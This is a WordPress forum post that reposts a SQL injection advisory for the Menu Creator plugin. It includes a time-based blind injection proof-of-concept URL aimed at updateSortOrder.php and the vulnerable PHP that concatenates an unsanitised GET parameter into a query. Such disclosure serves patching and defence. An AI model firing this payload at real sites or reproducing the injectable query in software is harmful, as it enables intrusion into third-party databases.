WordPress.org

1. sharingamak
   Member
   Posted 9 months ago #

   # Exploit Title: WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability
   # Date: 2011-08-18
   # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
   # Software Link: http://downloads.wordpress.org/plugin/wp-menu-creator.1.1.7.zip
   # Version: 1.1.7 (tested)

   ---
   PoC
   ---
   http://www.site.com/wp-content/plugins/wp-menu-creator/updateSortOrder.php?menu_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

   ---------------
   Vulnerable code
   ---------------
   $menu_id = $_GET['menu_id'];
   ...
   $first_item = $wpdb->get_row("SELECT * FROM " . $wpdb->prefix."menuitems WHERE order=0 AND parent=0 AND menu = $menu_id");

   http://wordpress.org/extend/plugins/wp-menu-creator/

Reply

You must log in to post.